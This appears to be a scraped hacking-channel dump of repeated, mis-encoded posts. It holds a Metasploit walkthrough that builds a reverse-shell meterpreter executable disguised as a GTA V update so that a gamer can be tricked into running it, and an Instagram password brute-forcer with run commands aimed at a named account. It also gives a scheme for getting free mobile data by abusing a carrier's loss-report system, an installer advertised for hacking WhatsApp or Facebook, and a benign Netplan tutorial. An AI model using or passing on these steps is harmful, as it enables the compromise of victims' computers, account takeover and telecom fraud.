โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHack Windows 10 with Metasploit :
1) Create metasploit
2) Before creating the metasploit, we need to figure out what is our Kali Linux local IP.
For that, run
3) Get the IPv4 Local IP
4) Now letโs get hands dirty!
5) In the terminal run the follow command:
> msfvenom -p windows/meterpreter/reverse_tcp -a x86 โ
platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe
6) The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.
7) The name of the .exe is up to you. In this case Iโll be using GTAVUpdate.exe because our target will be a gamer that we know has GTA V.
8) We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.
9) First, weโll tell Metasploit to use the generic payload handler โmulti/handlerโ using the command
10) The reverse TCP handler should begin waiting for a
You can use show options to check if everythingโs ok
11) If everythingโs ok type run or exploit
๐ฆSocial Engineer ;
1) Now itโs the part that you need to do some social engineer in order to make the user execute the program.
For this tutorial we will simply host the .exe on apache2 and transfer it on the Windows Machine.
2) On the Windows machine you just need to access via the browser the IP/File.exe
3) In our case is 192.168.192.72/GTAVUpdate.exe
4) Now execute and check the connection on the Kali
now you can dump & do everything
U S E F O R L E A R N !!
sources- metasploit/undercode/medium
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHack Windows 10 with Metasploit :
1) Create metasploit
2) Before creating the metasploit, we need to figure out what is our Kali Linux local IP.
For that, run
ip addror
ifconfig
3) Get the IPv4 Local IP
4) Now letโs get hands dirty!
5) In the terminal run the follow command:
> msfvenom -p windows/meterpreter/reverse_tcp -a x86 โ
platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe
6) The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.
7) The name of the .exe is up to you. In this case Iโll be using GTAVUpdate.exe because our target will be a gamer that we know has GTA V.
8) We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.
9) First, weโll tell Metasploit to use the generic payload handler โmulti/handlerโ using the command
use multi/handler. We will then set the payload to match the one set within the executable using the command
set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way โ
set LHOST 192.168.195.72and set
LPORT 4444. Once done, type
runor ```exploit```and press Enter.
10) The reverse TCP handler should begin waiting for a
You can use show options to check if everythingโs ok
11) If everythingโs ok type run or exploit
๐ฆSocial Engineer ;
1) Now itโs the part that you need to do some social engineer in order to make the user execute the program.
For this tutorial we will simply host the .exe on apache2 and transfer it on the Windows Machine.
2) On the Windows machine you just need to access via the browser the IP/File.exe
3) In our case is 192.168.192.72/GTAVUpdate.exe
4) Now execute and check the connection on the Kali
now you can dump & do everything
U S E F O R L E A R N !!
sources- metasploit/undercode/medium
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHACK INSTAGRAM NEW UPDATE 2020- 3 MONTHS :
This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden.
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1) git clone https://github.com/Pure-L0G1C/Instagram.git
2) cd instagram
3) pip3 install -r requirements.txt
4) C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h
usage: instagram.py [-h] [-m MODE] username wordlist
positional arguments:
username email or username
wordlist password list
optional arguments:
-h, --help show this help message and exit
-m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots
4) python3 instagram.py <username> <wordlist> -m <mode>
โโโโโโโโโโโโโโโ
5) Bots(Threads)
4 bots: 64 passwords at a time
8 bots: 128 passwords at a time
16 bots: 256 passwords at a time
32 bots: 512 passwords at a time
6) Modes
0: 32 bots
1: 16 bots
2: 8 bots
3: 4 bots
7) Chill mode
This mode uses only 4 bots, or 64 passwords at a time.
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3
8) Moderate mode 1
This mode uses 8 bots, or 128 passwords at a time.
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2
9) Moderate mode 2
This mode uses 16 bots, or 256 passwords at a time.
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1
10) Savage mode
This mode uses 32 bots, or 512 passwords at a time.
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0
11) If you don't specify a mode, then mode is set to 2
โ git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHACK INSTAGRAM NEW UPDATE 2020- 3 MONTHS :
This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden.
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1) git clone https://github.com/Pure-L0G1C/Instagram.git
2) cd instagram
3) pip3 install -r requirements.txt
4) C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h
usage: instagram.py [-h] [-m MODE] username wordlist
positional arguments:
username email or username
wordlist password list
optional arguments:
-h, --help show this help message and exit
-m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots
4) python3 instagram.py <username> <wordlist> -m <mode>
โโโโโโโโโโโโโโโ
5) Bots(Threads)
4 bots: 64 passwords at a time
8 bots: 128 passwords at a time
16 bots: 256 passwords at a time
32 bots: 512 passwords at a time
6) Modes
0: 32 bots
1: 16 bots
2: 8 bots
3: 4 bots
7) Chill mode
This mode uses only 4 bots, or 64 passwords at a time.
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3
8) Moderate mode 1
This mode uses 8 bots, or 128 passwords at a time.
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2
9) Moderate mode 2
This mode uses 16 bots, or 256 passwords at a time.
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1
10) Savage mode
This mode uses 32 bots, or 512 passwords at a time.
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0
11) If you don't specify a mode, then mode is set to 2
โ git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - Bitwise-01/Instagram-: Bruteforce attack for Instagram.
Bruteforce attack for Instagram. . Contribute to Bitwise-01/Instagram- development by creating an account on GitHub.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWebsite which provides vcc cards :
Entropay (http://www.entropay.com/) - Entropay is one of the best VCC providers that can help you to create your Virtual Credit Card free of cost. You can create your card by verifying your address and card information. Entropay charge small fee in each transaction. You can load fund from your bank account to your Entropay VCC.
Netletter VCC (http://www.neteller.com/personal/get-a-prepaid-card/) - Netletter is one of the best alternative to PayPal that also offers prepaid Mastercard that can be used as VCC for secure online transactions. Netletter takes small fees on transactions. You can create Netletter prepaid card free of cost by joining the site.
Netspend (https://www.netspend.com/) - Netspend is one of the best prepaid card providers for US residents. Netspend provides processing and marketing services for prepaid mastercard and Visa debit cards.
Payoneer (http://www.payoneer.com/) - Payoneer is one of the most popular payment processors for Global Payment. Payoneer offers prepaid
mastercards that can be used as Virtual credit card to pay money to thousands of websites. Payoneer charge small fee to users. Payoneer allows users to create set up free accounts to receive and send money to global sites.
American Express (https://
www.americanexpress.com/) - One of the most popular banking services that can also help you to create your prepaid and virtual credit cards easily. You can use American Express cards to pay money to hosting websites, online shopping companies and other international websites.
Bankfreedom (http://www.bankfreedom.com/) - Although this site is not very popular but very useful in online transactions. Bankfreedom offers many useful features that can help you to handle your business easily. Great for individuals and small business owners.
AccountNow (http://www.accountnow.com/) - AccountNow is one of the best alternatives to a checking account. AccountNow offers Prepaid credit cards and prepaid visa debit card. You can also use AccountNow cards in many useful purposes such as online shopping, money transfer etc.
ICICI VCC (http://www.icicibank.com/) - If you already have an account in ICICI bank, you can create your virtual credit card from your ICICI bank easily for online transactions. You can find more information about ICICI VCC on FAQ page of ICICI VCC
Kotak Netc@rd (http://www.kotak.com/bank/personal-banking/cards/netcard.html) - Kotak
Netc@rd is one of the best options for Indians to open prepaid credit cards for online transactions. You have to create an account in Kotak Mahindra Bank before you use Netc@rd.
HDFC VCC (http://www.hdfcbank.com/) - HDFC bank also offers virtual credit cards to HDFC users. HDFC offers netsafe cards for all HDFC bank Visa and Mastercard Debit and Creditcard holders free of cost. One of the safest ways to transfer your money online.
https://ezzocard.com/
https://dreamweavervcc.com/
https://entropay.com/
https://wirexapp.com/
https://ezzocard.com/
https://supervcc.com/
https://egiftcards24.com/
https://instavcc.com/
http://vccguru.com/
https://myvcc.biz/
sources : fcb/wiki/deepweb
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWebsite which provides vcc cards :
Entropay (http://www.entropay.com/) - Entropay is one of the best VCC providers that can help you to create your Virtual Credit Card free of cost. You can create your card by verifying your address and card information. Entropay charge small fee in each transaction. You can load fund from your bank account to your Entropay VCC.
Netletter VCC (http://www.neteller.com/personal/get-a-prepaid-card/) - Netletter is one of the best alternative to PayPal that also offers prepaid Mastercard that can be used as VCC for secure online transactions. Netletter takes small fees on transactions. You can create Netletter prepaid card free of cost by joining the site.
Netspend (https://www.netspend.com/) - Netspend is one of the best prepaid card providers for US residents. Netspend provides processing and marketing services for prepaid mastercard and Visa debit cards.
Payoneer (http://www.payoneer.com/) - Payoneer is one of the most popular payment processors for Global Payment. Payoneer offers prepaid
mastercards that can be used as Virtual credit card to pay money to thousands of websites. Payoneer charge small fee to users. Payoneer allows users to create set up free accounts to receive and send money to global sites.
American Express (https://
www.americanexpress.com/) - One of the most popular banking services that can also help you to create your prepaid and virtual credit cards easily. You can use American Express cards to pay money to hosting websites, online shopping companies and other international websites.
Bankfreedom (http://www.bankfreedom.com/) - Although this site is not very popular but very useful in online transactions. Bankfreedom offers many useful features that can help you to handle your business easily. Great for individuals and small business owners.
AccountNow (http://www.accountnow.com/) - AccountNow is one of the best alternatives to a checking account. AccountNow offers Prepaid credit cards and prepaid visa debit card. You can also use AccountNow cards in many useful purposes such as online shopping, money transfer etc.
ICICI VCC (http://www.icicibank.com/) - If you already have an account in ICICI bank, you can create your virtual credit card from your ICICI bank easily for online transactions. You can find more information about ICICI VCC on FAQ page of ICICI VCC
Kotak Netc@rd (http://www.kotak.com/bank/personal-banking/cards/netcard.html) - Kotak
Netc@rd is one of the best options for Indians to open prepaid credit cards for online transactions. You have to create an account in Kotak Mahindra Bank before you use Netc@rd.
HDFC VCC (http://www.hdfcbank.com/) - HDFC bank also offers virtual credit cards to HDFC users. HDFC offers netsafe cards for all HDFC bank Visa and Mastercard Debit and Creditcard holders free of cost. One of the safest ways to transfer your money online.
https://ezzocard.com/
https://dreamweavervcc.com/
https://entropay.com/
https://wirexapp.com/
https://ezzocard.com/
https://supervcc.com/
https://egiftcards24.com/
https://instavcc.com/
http://vccguru.com/
https://myvcc.biz/
sources : fcb/wiki/deepweb
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
NETELLER
Net+ Cards
The NETELLER award-winning Net+ Prepaid Mastercardยฎ gives you access to money at ATMs, shops and online - anywhere Mastercardยฎ is accepted. Join for free
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆUnlimited free internet access when the phone is down :
ใใYou can surf the Internet for free if your mobile phone is down. Now I will show you how to activate the card that has been down! ?After activation, you can surf the Internet for free. Note: "My dynamic zone card has been tested and passed"! First, prepare a card that has been shut down due to arrears. Pay attention to the key points: 1. Need to know the password of the card. 2. The card has not been cancelled. 3. The downtime does not exceed
๐ฆPhone down as unlimited free Internet access can
ใใnow reveal to you how to activate a card method has been shut down! ?After activation, you can surf the Internet for free. Note: "My dynamic zone card has been tested and passed"!
> First, prepare a card that has been shut down due to arrears. Pay attention to the key points: 1. Need to know the password of the card. 2. The card has not been cancelled. 3. The downtime is not more than three months" If all of the above are OK, you can start karaoke!
Step 1: Log in to China Mobile's online business hall and change the phone card password to 949389, which means China Mobile's initial code. This is to extend the system search time and bring convenience to operations.
Step 2: To report the loss of the mobile phone card, dial 13900139000 and follow the system voice operation, enter the card number, enter the password 949389, and the system will prompt that the loss report is successful.
Step 3: Use another card to send QXGS# number# password to 13900139000 to cancel the loss report operation. At this time, the shutdown card is activated, and you can surf the Internet as much as you like for five days, turning waste into treasure! Remember: "You canโt call and send text messages, and you donโt need to play charged things, otherwise the system will detect it, and the result will still be down. After five days, you repeat this operation again and you can use it again. I hope all friends can use unlimited cards, because mobile has made us too much money! It's time to share with us! Right!
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆUnlimited free internet access when the phone is down :
ใใYou can surf the Internet for free if your mobile phone is down. Now I will show you how to activate the card that has been down! ?After activation, you can surf the Internet for free. Note: "My dynamic zone card has been tested and passed"! First, prepare a card that has been shut down due to arrears. Pay attention to the key points: 1. Need to know the password of the card. 2. The card has not been cancelled. 3. The downtime does not exceed
๐ฆPhone down as unlimited free Internet access can
ใใnow reveal to you how to activate a card method has been shut down! ?After activation, you can surf the Internet for free. Note: "My dynamic zone card has been tested and passed"!
> First, prepare a card that has been shut down due to arrears. Pay attention to the key points: 1. Need to know the password of the card. 2. The card has not been cancelled. 3. The downtime is not more than three months" If all of the above are OK, you can start karaoke!
Step 1: Log in to China Mobile's online business hall and change the phone card password to 949389, which means China Mobile's initial code. This is to extend the system search time and bring convenience to operations.
Step 2: To report the loss of the mobile phone card, dial 13900139000 and follow the system voice operation, enter the card number, enter the password 949389, and the system will prompt that the loss report is successful.
Step 3: Use another card to send QXGS# number# password to 13900139000 to cancel the loss report operation. At this time, the shutdown card is activated, and you can surf the Internet as much as you like for five days, turning waste into treasure! Remember: "You canโt call and send text messages, and you donโt need to play charged things, otherwise the system will detect it, and the result will still be down. After five days, you repeat this operation again and you can use it again. I hope all friends can use unlimited cards, because mobile has made us too much money! It's time to share with us! Right!
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
UNDERCODE SECURITY
BURPSUITE FULL PRACTICAL.pdf
COMMANDS + PICTURES + EXAMPLES #FORBeginers
NEW TOOLS ADDED HACK WHATSAPP OR INSTAGRAM OR FACEBOOK ....
NEW UPDATE FROM 22 DAYS FOR TOOLX
1) apt update
2) apt install git
3) git clone https://github.com/rajkumardusad/Tool-X.git
4) cd Tool-X
5) chmod +x install
6) sh install if not work than use ./install
USE FOR LEARN
NEW UPDATE FROM 22 DAYS FOR TOOLX
1) apt update
2) apt install git
3) git clone https://github.com/rajkumardusad/Tool-X.git
4) cd Tool-X
5) chmod +x install
6) sh install if not work than use ./install
USE FOR LEARN
BYpasss/Unlocking Transcendence withJeffrey Allen
https://drive.google.com/folderview?id=1l2usYpm0ajOXZamHi7IJ3ZCAgleuCsKa
https://drive.google.com/folderview?id=1l2usYpm0ajOXZamHi7IJ3ZCAgleuCsKa
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆlINUX IP CONFIG TUTORIALS :
Netplan
Ubuntu 17.10 and newer uses Netplan as the default network management tool. Previous versions of Ubuntu used ifconfig and its / etc / network / interfaces config file to configure the network.
Netplan configuration files are written in YAML syntax with a .yaml file extension. To configure a network interface using Netplan, you need to create a YAML description for the interface, and Netplan will generate the necessary configuration files for the selected renderer.
Netplan supports two renderers, NetworkManager and Systemd-networkd. NetworkManager is mainly used on desktops, while Systemd-networkd is used on servers without a GUI.
๐ฆSetting up a static IP address on an Ubuntu server
In Ubuntu 20.04, the system identifies network interfaces using "predictable network interface names".
1) The first step to setting up a static IP address is to determine the name of the Ethernet interface you want to configure. To do this, use the ip link command as shown below:
> ip link
2) The command prints a list of all available network interfaces. In this example, the interface name is ens3:
> 1: lo: <LOOPBACK, UP, LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
> link / loopback 00: 00: 00: 00: 00: 00 brd 00: 00: 00: 00: 00: 00
> 2: ens3: <BROADCAST, MULTICAST, UP, LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
> link / ether 08: 00: 27: 6c: 13: 63 brd ff: ff: ff: ff: ff: ff
3) Netplan configuration files are stored in the / etc / netplan directory. You will likely find one or more YAML files in this directory. The file name may differ from setting to setting. Typically the file is named either 01-netcfg.yaml, 50-cloud-init.yaml, or NN_interfaceName.yaml, but it may be different on your system.
4) If your cloud-based Ubuntu instance has cloud-init, you need to disable it. To do this, create the following file:
sudo nano /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg
/etc/cloud/cloud.cfg.d/99-disable-network-config.cfg
network: {config: disabled}
5) To assign a static IP address on the network interface, open the YAML configuration file in a text editor :
sudo nano /etc/netplan/01-netcfg.yaml
/etc/netplan/01-netcfg.yaml
network:
version: 2
renderer: networkd
ethernets:
ens3:
dhcp4: yes
6) Before changing the configuration, let's briefly explain the code.
7) Every Netplan Yaml file starts with a network key, which contains at least two required elements. The first required element is the version of the network configuration format, and the second is the device type. The device type can be ethernets, bonds, bridges, or vlans.
8) The config also has a line showing the renderer type. By default, if you installed Ubuntu in server mode, the renderer is configured to use networkd as the backend.
9) Under the device type (ethernets) you can specify one or more network interfaces. In this example, we only have one ens3 interface configured to receive IP addressing from DHCP server dhcp4: yes.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆlINUX IP CONFIG TUTORIALS :
Netplan
Ubuntu 17.10 and newer uses Netplan as the default network management tool. Previous versions of Ubuntu used ifconfig and its / etc / network / interfaces config file to configure the network.
Netplan configuration files are written in YAML syntax with a .yaml file extension. To configure a network interface using Netplan, you need to create a YAML description for the interface, and Netplan will generate the necessary configuration files for the selected renderer.
Netplan supports two renderers, NetworkManager and Systemd-networkd. NetworkManager is mainly used on desktops, while Systemd-networkd is used on servers without a GUI.
๐ฆSetting up a static IP address on an Ubuntu server
In Ubuntu 20.04, the system identifies network interfaces using "predictable network interface names".
1) The first step to setting up a static IP address is to determine the name of the Ethernet interface you want to configure. To do this, use the ip link command as shown below:
> ip link
2) The command prints a list of all available network interfaces. In this example, the interface name is ens3:
> 1: lo: <LOOPBACK, UP, LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
> link / loopback 00: 00: 00: 00: 00: 00 brd 00: 00: 00: 00: 00: 00
> 2: ens3: <BROADCAST, MULTICAST, UP, LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
> link / ether 08: 00: 27: 6c: 13: 63 brd ff: ff: ff: ff: ff: ff
3) Netplan configuration files are stored in the / etc / netplan directory. You will likely find one or more YAML files in this directory. The file name may differ from setting to setting. Typically the file is named either 01-netcfg.yaml, 50-cloud-init.yaml, or NN_interfaceName.yaml, but it may be different on your system.
4) If your cloud-based Ubuntu instance has cloud-init, you need to disable it. To do this, create the following file:
sudo nano /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg
/etc/cloud/cloud.cfg.d/99-disable-network-config.cfg
network: {config: disabled}
5) To assign a static IP address on the network interface, open the YAML configuration file in a text editor :
sudo nano /etc/netplan/01-netcfg.yaml
/etc/netplan/01-netcfg.yaml
network:
version: 2
renderer: networkd
ethernets:
ens3:
dhcp4: yes
6) Before changing the configuration, let's briefly explain the code.
7) Every Netplan Yaml file starts with a network key, which contains at least two required elements. The first required element is the version of the network configuration format, and the second is the device type. The device type can be ethernets, bonds, bridges, or vlans.
8) The config also has a line showing the renderer type. By default, if you installed Ubuntu in server mode, the renderer is configured to use networkd as the backend.
9) Under the device type (ethernets) you can specify one or more network interfaces. In this example, we only have one ens3 interface configured to receive IP addressing from DHCP server dhcp4: yes.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ